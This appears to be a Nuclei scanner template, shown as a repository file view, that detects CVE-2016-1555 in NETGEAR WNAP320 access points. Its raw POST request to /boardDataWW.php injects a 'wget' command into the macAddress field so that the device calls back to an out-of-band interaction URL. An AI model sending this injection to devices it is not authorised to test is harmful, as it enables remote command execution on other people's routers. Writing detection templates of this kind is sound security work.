32 lines
1.0 KiB
YAML
32 lines
1.0 KiB
YAML
id: CVE-2016-1555
|
|
info:
|
|
name: NETGEAR WNAP320 Access Point Firmware Remote Command Execution
|
|
author: gy741
|
|
severity: critical
|
|
description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
|
|
reference:
|
|
- https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-1555
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10.0
|
|
cve-id: CVE-2016-1555
|
|
cwe-id: CWE-77
|
|
tags: netgear,rce,oast,router
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /boardDataWW.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|